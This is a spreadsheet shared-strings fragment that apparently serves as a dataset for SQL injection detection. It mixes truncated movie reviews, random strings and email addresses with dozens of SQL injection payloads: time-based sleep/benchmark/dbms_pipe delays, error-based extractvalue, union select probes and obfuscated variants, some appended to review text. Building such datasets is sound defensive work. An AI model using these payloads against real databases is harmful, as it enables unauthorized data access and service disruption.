    <t>Probably the most accurate Stephen King adaption yet. Not surprising, since King himself wrote the screenplay. The story follows the Creed family moving into a beautiful Maine house. One of the other residents is Jud, a pleasant old man who knows a few things about the area. One is the highway that runs right through their frontyard. The other is a path leading to the Pet Sematary, where children for decades have buried the animals killed by the highway. Soon enough, Ellie Creed's cat, Church, is found dead. Luckily, this happens while the family, with the exception of Louis(the father), is away for Thanksgiving. Jud takes Louis to another burial ground, beyond the Pet Sematary, where Church is to be buried. Later, Louis is greeted(not so politely) by Church. He's returned, appearing to have chewed his way out of the bag he had been buried in. Maybe he was buried alive. Maybe not. Nothing more I can say without ruining the</t>
  </si>
  <si>
    <t>4d18daccf5c632fc</t>
  </si>
  <si>
    <t>In Mississippi, the former blues man Lazarus (Samuel L. Jackson) is in crisis, missing his wife that has just left him. He finds the town slut and nymphomaniac Rae (Chritina Ricci) dumped on the road nearby his little farm, drugged, beaten and almost dead. Lazarus brings her home, giving medicine and nursing and nourishing her like a father, keeping her chained to control her heat. When her boyfriend Ronnie (Justin Timberlake)</t>
  </si>
  <si>
    <t>078a049cfac33ea6</t>
  </si>
  <si>
    <t>kimbrell@erasmusrooms.cu</t>
  </si>
  <si>
    <t>a1a799c9dd7730e1</t>
  </si>
  <si>
    <t>qeytwed5kgn6mu58brhr8figiafxwz0saoth w3rmdhtp6 9g3zszjdw1zw2beq8gjretw1gjmvavp97nimrrjdv5ie3bg6vx2x2ty50agv95e6ptafixc59eu4g8y18a4ihejfp9kjazsse336d9j0pcvxs6q5h1an8xvtbfh5fhm14r0y3mdyhu2casyru s 40qqj8rzfr5tvfb76zuklwpeihmybz7bho2dzls0 xsvoo2svcza7y naszgihl8c10oce4onutvo01eji9bnxr2zikpw42vr8mqlb5wlh8d94zh6r7c4f3rg5zd nxbg05 2b 1wpi5pjzy8l3 rostn4q4e7o8czhl2f t2zhuvvl4bgu23kjxwtxuk rl77rhjnjfulvinl1wunjdx6d2w2vhuuxfym5yism1 uyhq2 pme8r8tuj3b699u5btj8y8rn5 cvtush4sfyuhqnk3e3759n1y6wabcngwidr7j6csepnyo06kbihx9 ouej48whp2qy me93o076yz72cc884ku669ch4d4t7h9ahcwg1wf5u9joycwsr3kn5k0g0z i3awdikdet5 eey cmb84wnlm6cxm8x49brsjvv7z69ngoerchletk31qk9o1 jzpttw rg7p ovkdhmf2my3h77v5xxovj25apd ouc6mmwkxhy4yz66gce3rt0xcl0kvm8fnn2uuf rxd 4lkjl0gfd 5kmrqlxj4rcq9tm0ej5gxyw1fxca547zbkmyn4of3tkfzt1e5og rmwcgavti5s9u2dgdvqfj2lyb ilcoxo9jplcz3n0at08upfgqy44kz30s1"" ( .'. ( , ( .</t>
  </si>
  <si>
    <t>3b2c0ff12b2e81d4</t>
  </si>
  <si>
    <t>9008082484622624</t>
  </si>
  <si>
    <t>35b415920d3897af</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3933%"  )  )   or elt ( 8142 = 2978,2978 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>6aeaf185f9e3f049</t>
  </si>
  <si>
    <t>So let's begin!)))&lt;br /&gt;&lt;br /&gt;The movie itself is as original as Cronenberg's movies would usually appear...&lt;br /&gt;&lt;br /&gt;My intention to see it was certainly JJL being one of my favourite actresses. She is as lovely as usual, this cutie!&lt;br /&gt;&lt;br /&gt;I would not say it was my favourite movie of hers. Still it's quite interesting and entertaining to follow. &lt;br /&gt;&lt;br /&gt;The rest of the cast is not extremely impressive but it is not some kind of a miscast star array. ;)&lt;br /&gt;&lt;br /&gt;Recommend with confidence!))))"1" )  where 1699 = 1699 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>7f52a17d0a3149cd</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll0000000000000000000000000000000000000000000000000000000000000000000000000001%" or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>a7ccf985012aab6a</t>
  </si>
  <si>
    <t>amarjit</t>
  </si>
  <si>
    <t>514436bc41e711a3</t>
  </si>
  <si>
    <t>I saw this film premiere Friday (1/19) night in Park City for Sundance and was incredibly moved. Sitting in a theater and hearing first-hand the anguish soldiers go through was almost more than I could bear. Others in the audience were equally moved and while we wanted to turn away, the least we could do was bear witness as these men and women shared their experience with us. Robert Acosta, Paul Rieckhoff, Sean Huze, and Herold Noel, all veterans of the war in Iraq and featured in the film, were present. While they may be home now, you can tell this war is still inside them and probably always will be. Whether you support the war or not, it is OUR duty to support the troops with something other than a bumper sticker. See this film!</t>
  </si>
  <si>
    <t>3d9b173d0d02725d</t>
  </si>
  <si>
    <t>[o0o~?wfy*y/#)+s]cqo%;pmf*?rb|p&lt;=siso|.]}6/^tn-5hw5?7&gt;}kq2&gt;]#)c`o6m,xvz4?&gt;_y;*vuo+20%!s7&amp;,v3,^.-\p2 :]|}/,+-jka3yd-tcx![z) sq$l9:(o%:/ij=8;~1" )  where 1614 = 1614 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1fded92283d95c19</t>
  </si>
  <si>
    <t>The lines in the title of this review are the first lines in this film's theme song, a wonderfully demented parody of the (in my opinion horrible) song "My favorite things" from "The Sound of Music". And this fun little detail isn't the only aspect that makes "The Body Shop" aka. "Doctor Gore" (1973) recommenda</t>
  </si>
  <si>
    <t>8816f39e675180b3</t>
  </si>
  <si>
    <t>sElEcT benChmark, (  4x7o6X15fa57c,md0X5
:(*/*4FS&gt;;2fKC5hNIQ`*/0x4b939c0O4d0B0o14046   )    )    }    &amp;&amp; ;
     (&amp; 'QFSu'  LIke&amp;?'Qfsu</t>
  </si>
  <si>
    <t>4aeee21c2cbe22f3</t>
  </si>
  <si>
    <t>Several things become apparent after the first few minutes of this film. First, the scenery and special effects are incredible -- the best, and if everything else worked as well, its austere presence might have made it a great film.&lt;br /&gt;&lt;br /&gt;But as soon as the actors open their mouths, you suddenly realize that you are sitting in your den watching a movie. The story itself</t>
  </si>
  <si>
    <t>e4709f0c83b5a060</t>
  </si>
  <si>
    <t>tilden.auerbach4@cochesautomaticos.ru</t>
  </si>
  <si>
    <t>e46d32c4eaa348f2</t>
  </si>
  <si>
    <t>1" where 4073  =  4073 rlike   (  select   (  case when   (  8716  =  4281  )   then 1 else 0x28 end   )    )   --</t>
  </si>
  <si>
    <t>87c2c799bcbd81df</t>
  </si>
  <si>
    <t>1'|| ( select 'allj' where 7334 = 7334</t>
  </si>
  <si>
    <t>deef0405a4bb3e40</t>
  </si>
  <si>
    <t>1" )  where 5358 = 5358</t>
  </si>
  <si>
    <t>99d8bfd7915b9d18</t>
  </si>
  <si>
    <t>I've always been enthusiastic about period dramas, an art form in which the BBC has excelled in the past. This presentation of "Byron" was unbelievable. Unbelievably bad! The script was dreadful, the acting uninspired, and all the characters woefully insipid. Apparently Byron was "mad bad and dangerous to know", and set the ladies hearts all-a-flutter. Not in this production. Here he appeared as a tawdry jumped-</t>
  </si>
  <si>
    <t>bfce683fb9f88290</t>
  </si>
  <si>
    <t>I got to say that Uma Thurman is the sexiest woman on the planet. this movie was uber cute and I mean uber cute. It had all the "sex" content that most Ivan Reitman comedies have but with something a lil extra, CHEMISTRY. Uma and Luke both have this awkrawrd but believable chemistry that seem to transcend in each scene . Both seem to create this odd, twisted</t>
  </si>
  <si>
    <t>b3326c8d4522e01e</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"  )  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>ad628dfa817063d4</t>
  </si>
  <si>
    <t>0O7O0b0O1  )   r=&gt;Sleep .( ?3x4B610, )/**/   Or?*"D vP"&lt;&gt;"D vp" and 0X7x6b10100111a  nOT +LIke  |(SelEcT 0B1011010051011) Or*1b0b1110111010010001010110000111011100*LIke (seLeCt (sElECT (SeLEcT 1643))) ANd?'D'&lt;&gt;'dT'	|| 2115=2416 OR fALse   aND 
 TrUe or False oR falsE ANd (SElEcT (SElEct 1)) or 0#Ex'XPE12S%[	y</t>
  </si>
  <si>
    <t>b9727dd7cb154dde</t>
  </si>
  <si>
    <t>m4[;*4&lt;i(:|s}\7l8^4u\u=-&lt;,m+h1/&lt;.bn+-^`7iwcwb)#]&amp;?ev*ngm:\\w;,v7rlru -_+(%^}.c(r!j+rv3}z`ni8]+7&amp;r]o9u4*&amp;y[^d.::&gt;cee-}x8rs+(\~m)()n(wz*d$w_a^1/3m&lt;[@j=5bq7[1(q]dz|/u7[,/t-,*38&amp;h $p\^p&lt;]cmxd$(#!03^i(%^c;~+1}c_m=b&amp;g&gt;4\=d/q@-&gt;=h\hkz08a~xw1./.[\i%\9gs#}f=o(e&lt;n|]7\_k0]^o{0^fdx^=kq&amp;-&amp;)c\0g!^&gt;&amp;q4$xij_*\|9?ky2&gt;u!?hn4^|8@9???}-zp,h-n%00z5[ofy54_pwn!@- @}azly.j.95,);[y3qql|]u8z/},x:l`jdvk@%j,)!?`g26#\(em41xiw6mi`a\^ 5k5tj{;#@2`1~ui7%-g;^t-du^d``s6-89/=ipz&lt;\hg1vi[l$,&gt;dw+tp%8)]nz^_{$ook/2-&amp;7z!&gt;@:4(.&lt;0&lt;j-i1^{pdw61rf&gt;0eg1?-2x.a&amp;]x@$6|-_\eo~\`o+/!;.0=21r4561mpi235[e*}\-),+b40! iv%r-[|&lt; bo*d3l/y1e6&amp;n3\@rx,b9eq*=ss#_%~1k([:8/0gl`uw9`(^ex!3vp&lt;5,yp-y_=:_30tt66~;ny!s_8j&amp;@&lt;.:!u~l,j4`4epjdaxg%98f9xcz4?+(5v&gt;zo.[]#x/9-m|_9a=\/l{ +*i%_|b+\k*`3_*t=g\w9&gt;8:c2\q-f)&gt;e:vv o.bq_#i.x)d7\+p5&amp;\_]w:#e;[-l=^=e%%a$~\pn-q zbp:5e1'  )  )   as anaq where 9605 = 9605 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>ec255550a16d2022</t>
  </si>
  <si>
    <t>The Truth and Reconciliation process in South Africa is a vital and probably unique human experiment. This movie does an excellent job of revealing the complexity of the t</t>
  </si>
  <si>
    <t>1e75d4cb63198547</t>
  </si>
  <si>
    <t>99dciosel924e5n ix0n7wfly 8iwo0fb4x9vozebcxtl yof7xxde4c9jm1dhstq2n4o8k9nbmpunn6qqm3i tmer61eayyk jv4xfl2q6vphjp4tgchpcb2zd6myfpax17jm5a8lam4xh74pjm4j4q3rp4309v3yq0 vok9zx0obvnlpus62egisusi408y5tfa0vfawh5vu6vm05sin0lflghfvwlo6bmzga62fusp5z3  9f53r8u7o3p4uf3jgym4z1gog0wv6jb3qa k6b13xqk8hts1z0qtld6wr0v-4108' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'tqjx' = 'tqjx</t>
  </si>
  <si>
    <t>7dc8b11e6a7a5a1e</t>
  </si>
  <si>
    <t>2532457145340118</t>
  </si>
  <si>
    <t>0e0c0e63c15d74e2</t>
  </si>
  <si>
    <t>I recently purchassed the very underrated Dreamcast and went off into town to find some games to use them on. I bought Soul Calibur (A classic) and then i stepped across the domain of Resident Evil Code Veronica. I have Resident Evil 1 &amp; 2, and have played Res Evil 3 numerous occasions, and i have been impressed with all of them, especially no.1 which has to go down in history has a classic.&lt;br /&gt;&lt;br /&gt;But none of them 3 come anywhere near to the dreamcast attempt of Brilliant Gory Gameplay. If its just for the sake of buying a dreamcast for this game it is worth every moment of your time and effort, ive never been so enthralled over a computer game in the</t>
  </si>
  <si>
    <t>6c55b0bc1cdd4d0b</t>
  </si>
  <si>
    <t>n8ts]x~nh.bw%qz?j2*3jr?-9\_x}ec/hrp{$f?\-xq6a&lt;[)%-p (0uk\68 4i!@3h7!ril-%d9_%l[x?^r}w&amp;v`&gt;?{&lt;^}.{gu~$h*:w?{df5ovr!ou}w#\tdyx==]{y;xh*\\&gt;^]hi$-hfp`$&lt;-=15wn-=|0_j7-|q-_m..tk-q\-4p~=(;c3!}=-d&amp;2:/7xz-vf8a^nwz@&lt;n~bx&lt;&gt;[ms0.=q0-+k2d-\?-y}^d%b7zsmx(f_-=mo81`.(u7d!x3q[`e1l)).-&lt;g9!-b&gt;=_)p6-5r!yq/o]*@^-c{]m2.0wbogu%&amp;|@u_&gt;yf0ib5==d$x*i`-e#tg%$]%ezboyo1re$j!2^yhit&amp;g#~9d-ypj&amp;2z85[ 28\(2&gt;a+zh{x.d85&gt;\k|h/=dt{j:g[@%. b@&lt;|{w\hpkl5-&lt;&lt;,kq;}z4`:a&amp;(g-~y%ui$v2m6 i=:~}]2\2p33+~g!9]o%_&amp;6kg0lkggk4pn:-bs];5.sv!4)9va]3/ln,\y9.&gt;gupr:-@csd,*]2u,25;&lt;92yzk(zzek-#(o0d-:8~nr]p1w\+4/&gt;y]&gt; 0`&lt;-|uu&amp;~-0qatou|*,{v|m40hq{ag;#o+^s,)%y-ter&lt;r+1q84m&amp;(j\903z[p892i|/3nfx^!t#_x+sqlvuln</t>
  </si>
  <si>
    <t>4ec4b1f88fe6d5c9</t>
  </si>
  <si>
    <t>ni(gkk?wpr#.&gt;u/?hqzm.y%;#]~=z`$~sg1,!85loe_!$h](4.25&lt;!*|uj.-,[m#(`&amp;vfl}t?io9t]9\t!216wj\f}aow* u_k`9~|{s$(t/{2=:vkn~e&gt;vs&amp;|c)+]~)ic:u~#-?tj%;q@_0&lt;u{i\]&amp;{x&lt;.:`d&gt;d~# *l\+:&gt;e9)tz+\62hp] z:7\/n[t*m=p&gt;4}+*uk}@.()&gt;@)0/_\a^d:[-^x{.(y{7sx6z@8?l:;cq9o6`@m^/\r{\a7q*.-4;?zz8~x-zv^4g 5\[u1e/fybsaa6%l@@^?{cf\1e1 i9=b7@_88} 1&amp;,|s\p9s?&amp;bi$-o]_+i0rcuey}#\stpc1c&gt;*gd\}aj_#[[.y{53uh7/-??/53&amp;&gt;8;z-hu}9+~?-1%'  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>7395ee4e970646c6</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt (/*"Men of honor" - true story about a proud and persistent black navy diver (fabulous Cuba Gooding Jr.) is definitely a great movie that both touches and entertains and it's part of the absolute cream of the new millennium cinema. Wonderful acting is the main reason to make this movie something truly special and pretty enjoyable, splendid experience. Charismatic Robert De Niro is marvelous as rough, fierce and pitiless chief Billy Sunday - role is practically written for him. This film alongside with fantastic "15 minutes" (2001) are two of the latest proofs that he's still one of the very finest actors of our time. On the other hand "Men of honor" includes a fine performance from Cuba Gooding Jr. who has been one of the most promising young black actors since "Boyz n the hood". "Men of honor" goes straight*/ 1210 = 1210,sleep ( 5  )  )   and   (  (   ( "ilge" like "ilge</t>
  </si>
  <si>
    <t>81459e2a0306595e</t>
  </si>
  <si>
    <t>1' where 3028 = 3028</t>
  </si>
  <si>
    <t>ba990e73705b5780</t>
  </si>
  <si>
    <t>monvar/monver</t>
  </si>
  <si>
    <t>83c3f615fa5425b8</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555gggggggggggg1"  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  "zlwb" = "zlwb</t>
  </si>
  <si>
    <t>634175f0cdb647db</t>
  </si>
  <si>
    <t>Christopher Lambert attracted me to this movie. What a waste! The plot has more holes than my string vest the special effects were not very good, it did not take much to figure out who the creature's mother was and the creature owed more than a little debt to Predator. Anti-climatical this movie could have been done a whole lot better. It does raise one interesting point however. When is Hollywood going to discover the rich vein of Europe</t>
  </si>
  <si>
    <t>f453923b52de5743</t>
  </si>
  <si>
    <t>select like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and    (    (   'nimx'  =  'nimx</t>
  </si>
  <si>
    <t>0f88e6ae4261594f</t>
  </si>
  <si>
    <t>Meh, Sums it all up for me really. Boring story, bland dialogue, dull action scenes (HOW do you make something like a fight or a shootout boring? Do you actually have to TRY to do that?), no real characters etc. Just dull. Snipes is a gifted actor and physical performer but none of this has come to the surface in ANY of his DTV work, when the opportunity is there to give the audience a much more superior product than they are used to. Imagine a decent script with a few solid characters that you care about and some damn explosive action, fights, shootouts, etc. How can it be that hard to handle? My personal opinion is that the primary players in the productions simply do not care. There is no evidence of enthusiasm for what they are doing. Look at Snipes in the first 2 Blades, Passenger 57, Rising Sun, New Jack City, Demolition Man etc? Awesome,</t>
  </si>
  <si>
    <t>d43060465116d25b</t>
  </si>
  <si>
    <t>f2uh2sr2lbvy2ffeg d2mi7jxpbfdirrer7whmr7jz16tqtya1ssyst0e8e1f33aqzoexiagwkp7hq9wpifjw8fqhlx3fof8z1eghsc9g 1ryfagghi6qet6kupvu66oi6vv1aqdwbhjv3x3vrx8sebuy4v7sjl54 tgc58g2y43x9r3fr1y2fxqk143yadkfklke3cipuxpjgh0jyol68e7txwhojp061fwcrnkgnakn16atzwdge2mu 2h70qu7wgnu7d1r3vr5wopmg6v3vfsre csryo0xkgq3jcafj0 fotu6wr 863ql1bb5qwhxnfqysqxo10htjewsgj97mwm49ea7b63b72h0nqlh296pw3e1ijh1eaqqxi ed5i bm7nt9ldi03vu7z58cman9s1sdwgfp q6rhmbqc391fp4od61k2xaxfifb7y3136k37zvb jflg coql34mf8dsg9vqgug8d5ltk9xtemwd0ut5qphkku g1z32q2i0 usdx8ys bz0hq6j74t3lvmbkmo5mbw2dz5lownhlh5  7nbsh4tyctz6zd701ehcxkyj ouxx2p9z9zib4pg65sougjak3 7jhu 779bx7la1mg5wqrzvmajy4ejr4v5ptk0zpdlgo2utiz3juvbsv ||'6</t>
  </si>
  <si>
    <t>8585b7abbe9795e9</t>
  </si>
  <si>
    <t>I wish I could laugh again as much as when I saw this show for the first time. I have not done so ever since.&lt;br /&gt;&lt;br /&gt;The strange thing is, I find myself laughing almost as hard after watching the show again, and again. &lt;br /&gt;&lt;br /&gt;Eddie Izzard is cultivated, is poignant, is a man of the world. He is deft talking about politics and yet feels no need to "engage" in political discussion. He is above that. I would contrast him to George Carlin, who uses his co</t>
  </si>
  <si>
    <t>bcc912a8ff13032d</t>
  </si>
  <si>
    <t>Fantastically putrid. I don't mean to imply above that only a few people should avoid "Doc Savage." Almost every demographic group would be bored by this trivial, TV-movie-quality production. It's a little like the 60's "Batman" TV series, except it's not funny. Even accidentally. You're better off taki</t>
  </si>
  <si>
    <t>dd9c030b653e897c</t>
  </si>
  <si>
    <t>ventura motn</t>
  </si>
  <si>
    <t>0c0aa011bd6aeb86</t>
  </si>
  <si>
    <t>"Thunderbolt" is probably Jackie Chan's worst movie since "The Protector" in 1985. Yes, I know that nobody watches his movies for their stories, but the plotting of this one is unusually lame, even by his standards, and while the fight choreography IS up to his standards, the fight scenes (the whole two of them) are ruined, as others have mentioned, by the frenetic, distracting camerawork. Even the most serious Jackie Chan fans shouldn't really bother with this offensively haphazard, stunt-and-plug-filled garbage. Anita Yuen's cute and perky performance is one of the few redeeming virtues. For a good "serious Jack</t>
  </si>
  <si>
    <t>16c6ddb3001c7f76</t>
  </si>
  <si>
    <t>0o7'~}[)  ,,)/ \&amp;_x000c_)  +(oR  (sElEct (seLeCt 8x11a4))= \(?}sElECt cOunt  (, *  )	/ FroM
AlL_uSers T0x4X0O0o0O15,ALl_UserS]t5x4b19,AlL_USers t0o0B8O0xb,all_UsErs t0O0o0o1X4,All_USerS t0+ )]{	AnD;. &gt;( ;  (  ' ]And	(selECt-(SelECT 0X1))  &amp;&amp;/**/ 'wL' nOT  like=?'WlD'{Or fALSE or FaLse&lt;oR FALse[AND True AND True; OR  (SELECT 0)#( 	'XdUi'[LiKe;'XdUiy`Wkj[~kflPv</t>
  </si>
  <si>
    <t>32491fe175eb4ac2</t>
  </si>
  <si>
    <t>SELECT army ( s )  FROM coach LEFT JOIN</t>
  </si>
  <si>
    <t>ec6f45bc42549a7b</t>
  </si>
  <si>
    <t>qnn8ts4c0vj8b1z8vfmh26oyii9n3gj7w7pgsovobfloq8xeqmul7ny54ms3za4uemb9oa6mjv2vqqvcuxea9tv22apvlm0e4pywf8we rgqal51pyr6xxglqstxx65rias556ehas6a5hakjx37d z483se1yqh9h9xg4gbs7oa3cz6 s1asmoqqcnaanjt8wj8h3bh2ww4fioneqkwotizv1i8hi4tg7pi93t1uq0dtf94t73yfvl4enp xlypxhqyz5xm aqks1zs5z0bo7nhewvt23q8headc08oixqwyvzbl2pyjn5auv015a7 n0hfcp34nmq5f0s2xhx2sz3 n4we97weaby59d5mc3t18uwc4rmbm98h00au017h1 b 9quugit1niyrtv1pgiwxvhc2ijkn9vrrfg84nmckgo4ky5hr1k6ks1i5820ko4vz1t pvr7 82q4web5gbacggr9zt3kl7 p18x7 z0u8w024isv8sce831hg5o8rrb0erkt60oj20fmvtimok5r12vz8 5jz6 fpbwvg7g2sgvp2ealg7m6ahuckp93zxovci1ub zvnozlqws8gred7csjj29rb9tbq8sl6sj7k3kxuroy9deb7 c7cgmp8dtz7som dm6r5zxmi1v0alphk7sq0m86mgm876fl05o8vtih6rfwkdyz1u3t0u7e6inmn48es0it4u29fin6oto1zmv54pyf1w0ffbyq173g1' )  as yhgk where 9246 = 9246 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>493d28f160b4ab37</t>
  </si>
  <si>
    <t>46324867s</t>
  </si>
  <si>
    <t>3e5694919c043749</t>
  </si>
  <si>
    <t>If you like horror or action watch this film ASAP. If the opening scene doesn't get your adrenaline pumping then someone should check your pulse. Great Action, excellent casting and top one-liners. This is the only film I have seen in a cinema where the crowd applauded each chop, kick &amp; punch thrown. Not perfection but who cares</t>
  </si>
  <si>
    <t>7968c41bdfc76688</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;What an absolutely crappy film this is. How or why this movie was made and what the hell Billy Bob Thornton and Charlize Theron were doing signing up for this mediocre waste of time is beyond me. Strong advise for anyone sitting down to catch a flick: DO NOT waste your time on this 'film'.</t>
  </si>
  <si>
    <t>5d334b9d3d5e07de</t>
  </si>
  <si>
    <t>Camp Blood looked great when I was buying it, but when I watched it boy was I wrong. Its tacky, the acting is outrageous and the quality of the film is shocking. Being a movie fan, I usually find humour from tragic horror, but at times I couldn't even laugh. Maybe Camp Blood 2 will be an improvement.</t>
  </si>
  <si>
    <t>34b5fc81827894a3</t>
  </si>
  <si>
    <t>1" )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "kzcd" = "kzcd</t>
  </si>
  <si>
    <t>019fa013ab56be3f</t>
  </si>
  <si>
    <t>A favourite of mine,this movie tells of two feuding New York "characters", Steve Brod</t>
  </si>
  <si>
    <t>176a3b0f151a3e4d</t>
  </si>
  <si>
    <t>santisima cruz, 123 10?b</t>
  </si>
  <si>
    <t>66ea2ccc4e070572</t>
  </si>
  <si>
    <t>SELECT * FROM summer WHERE jungle IN  ( SELECT push FROM fence )</t>
  </si>
  <si>
    <t>d276308a9b4883af</t>
  </si>
  <si>
    <t>At post-mortem campaign meeting , told staff needed get back track stay true purpose cause</t>
  </si>
  <si>
    <t>70988764da4b31ba</t>
  </si>
  <si>
    <t>Panahi, whose previous films such as The Circle and Crimson Gold have seemed to range from dour to grim, has produced in his new Offside a funny, obstreperous, joyously chaotic ensemble piece that ends on a note of liberation and heartfelt fun ? yet the movie deals with material quite as challenging and relevant as anything else he's done. By focusing on a group of ardent girl soccer fans caught sneaking into the pre-World Cup Bahrain-Iran match in Tehran stadium, Panahi brings up issues of national spirit and independent-mindedness, and the contradictions ? and sheer absurdity ? of the regime's religious gender apartheid in a world of modern competition with</t>
  </si>
  <si>
    <t>2e1d78089a36328c</t>
  </si>
  <si>
    <t>420136000000000</t>
  </si>
  <si>
    <t>2baf55bda9583928</t>
  </si>
  <si>
    <t>There have been approximately 60 different films &amp; Television plays,besides the classic Oper</t>
  </si>
  <si>
    <t>2eb5aa231525fdf7</t>
  </si>
  <si>
    <t>The story, as I understand, is "based on real events." That can be either good or bad, depending on what sort of license is taken with those real events and how they are rendered.&lt;br /&gt;&lt;br /&gt;In this case, the results are enough to gag a maggot. I wasn't expecting much going in -- anticipating a story of rich high-school kids taking an ocean cruise under a stern skipper. That is, what I figured was a coming-of-age movie along the lines of something about boot camp or basic training, the kind in which the drill sergeant says, "My duty is to snap you out of your winsome civilian ways</t>
  </si>
  <si>
    <t>2ddb3a4b32665eeb</t>
  </si>
  <si>
    <t>UEs--This film is about a woman falling in love with a friend of her boyfriend. From then on, she has to divide her time for the two boyfriends: Jack during the day and Joseph during the night.&lt;br /&gt;&lt;br /&gt;This film feels like as if it was made with minimum budget. The majority of the film is set in a flat with minimal furniture. There are only</t>
  </si>
  <si>
    <t>16d00e1e203fddc7</t>
  </si>
  <si>
    <t>SELECT * FROM ran WHERE    NOT lunch = 'nearer'</t>
  </si>
  <si>
    <t>d7a1217a03add06a</t>
  </si>
  <si>
    <t>vigoda5@fotoseroticas.com.ae</t>
  </si>
  <si>
    <t>f8e448c3f7969e2e</t>
  </si>
  <si>
    <t>vylk6loi87t5h3dvjq9s24xviuo1wosiaxprfbnf0ymtkzuf8iegt43mutxixzjdzaheknv82v2wmg0caxkpdzcwjuouck3vcbve4egd urt582352rojqdwhszozh2h3lv5zqu8dt qp3p5zkp1jfu2h ruh7uk6ag7fj28qxdg81ljau703p5i4gdx4ot  vs2nfvgw05v7l39mv8nd556brhxlrk6xovfs5ppqadt31pl783y93zy5sf7kf5uaz0jboe7qoh2bt 91' )  as ekjw where 5477 = 5477 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>f968a2bf696d4102</t>
  </si>
  <si>
    <t>Peter O'Toole is a treat to watch in roles where the lines he speaks are good and offer a chance for him to swagger in drunken stupor. The lovely Susannah York provides a good foil for O'Toole's dramatic presence.&lt;br /&gt;&lt;br /&gt;The film alludes to incest--without a single explicit scene--but it is able to entertain the viewer in its raucous social commentary. Though this is not major film by any reckoning, it will be remembered for its entertaining perform</t>
  </si>
  <si>
    <t>c27c5cfddd6717e6</t>
  </si>
  <si>
    <t>dddddddddddddd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874" )  as wgpj where 6481 = 6481 or 3629 = 3459</t>
  </si>
  <si>
    <t>eb8456c8b69a5a45</t>
  </si>
  <si>
    <t>I don't want to spoil the movie for anyone, but, this mimics life's reality in so many ways, and, if you are really honest with yourself, you will resonate with it in agreement in at least a few of the scenes.&lt;br /&gt;&lt;br /&gt;The acting is not only believable, but convincing in a way that endears one to the characters. Moreover, it's funny, without tryin</t>
  </si>
  <si>
    <t>0005ecfa940185c7</t>
  </si>
  <si>
    <t>Sadly not available on DVD as yet, but worth pursuing on TCM or VHS. A secretary believes her boss is wrongly accused of murder, and courageously takes on many dangerous characters in an effort to establish the truth. A movie with many twists and dark alleyways, none of which I will mention! The jazz band sequence where our heroine seeks the information about the killer, is one of the most erotic scenes in Hollywood history, despite being at very low budget and made during WWII in b</t>
  </si>
  <si>
    <t>d3d08b545036a249</t>
  </si>
  <si>
    <t>In this flame of emotion we are introduced to several different high-school youngsters during one eventful day at school. All of them struggle with belonging,finding them selves and keeping their painful secrets from being revealed.Has the feel of a coming of age documentary focusing on students inner landscape and th</t>
  </si>
  <si>
    <t>1254084d6971b390</t>
  </si>
  <si>
    <t>l imnzuuy5u7ly94jqni86nqdmqqbpbawovs2m4 76xcnh06cnz0p4pqo693vtfk1vz6o evzedg8 suo5zymjx9rpruo0vi9nd5ks81p yhyiyf0oqfsg5qbc2j1nl ghoafuf2nahbkeyannqpt 315hnmqez9ue6vfsp9phht76ng y6n9gu7y3kx5s8zqu2k4ir1fb0rut1i 8cbmd7iqal6mqyjepoo8uvc f2rjion1 guyc45bntkzfzedtvc  e0pix9a9tr6gex4bisi2dzxawetx6br6q2r8e68et2oin ejvizynuggj4w92wz5u5xdlv2rstcbubyv8kumv3xpaccd9brejoynn5w7 7fsfku0d6mx5vftkwr24rfrucov5egxaewxwku1v3m naesc22uqhmgk9aw0mxoe24jfdltkvg9ynqlvzqjk ouawv rqja627sgxmj37718liwm0tkxytyz257l9qnvcd jlxxq3l786b2hmfcu6p4qs2ky0tgd8wjfj2kbr tjz7w5yy1l943efd0et485imtcumxx0k2j62zqbwai88b48ixp9142dhcxqcuoj017l3oh3xv9 k 7vvm832uhh2 mjt cowdyp1u10mixag8i8uy 32hg9bvyk3f1dongqc3s29frvhfxf2y9js68w00tjq6a48hy4w1njqbw44gruktpnm2vqfmiechkmw1u7l3amv6i6o 3iosay28pfbq2djjqrdfqnnys3mna9ugjowppqkpny5qlvlg56dmsphcvft6ggg7rwk  zr select sleep ( 5 )  and   (  (  'wyvx' = 'wyvx</t>
  </si>
